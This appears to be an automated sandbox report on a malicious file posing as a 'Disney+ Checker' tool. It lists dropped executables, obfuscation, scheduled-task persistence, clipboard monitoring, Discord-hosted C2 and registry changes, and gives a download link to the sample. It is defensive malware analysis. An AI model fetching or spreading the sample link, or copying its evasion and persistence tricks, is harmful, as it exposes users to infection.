Analysis Overview
Threat Level: Likely malicious
The file https://gofile.io/d/NGsQfm was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Executes dropped EXE
Obfuscated with Agile.Net obfuscator
UPX packed file
Legitimate hosting services abused for malware hosting/C2
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Browser Information Discovery
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: AddClipboardFormatListener
Suspicious use of AdjustPrivilegeToken
Views/modifies file attributes
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Modifies registry class
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
Enumerates system info in registry
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
| Field | Value |
| Reported | 2024-09-02 08:37 |
Signatures
Analysis: behavioral1
Detonation Overview
| Field | Value |
| Submitted | 2024-09-02 08:37 |
| Reported | 2024-09-02 08:45 |
| Platform | win10v2004-20240802-en |
| Max time kernel | 480s |
| Max time network | 510s |
| Command Line | |
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\BackEndUpdates\FontDriverHost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\Disney+ Checker By PJ v1.1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\BackEndUpdates\FontDriverHost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\System\FontDriverHost.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Documents" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Downloads" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "7" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 010000000200000000000000ffffffff | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\NodeSlot = "6" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2412658365-3084825385-3340777666-1000\{978630FF-3ECB-4D8C-AA9C-BE518C894DD9} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 020000000000000001000000ffffffff | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\MRUListEx = ffffffff | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\BackEndUpdates\FontDriverHost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
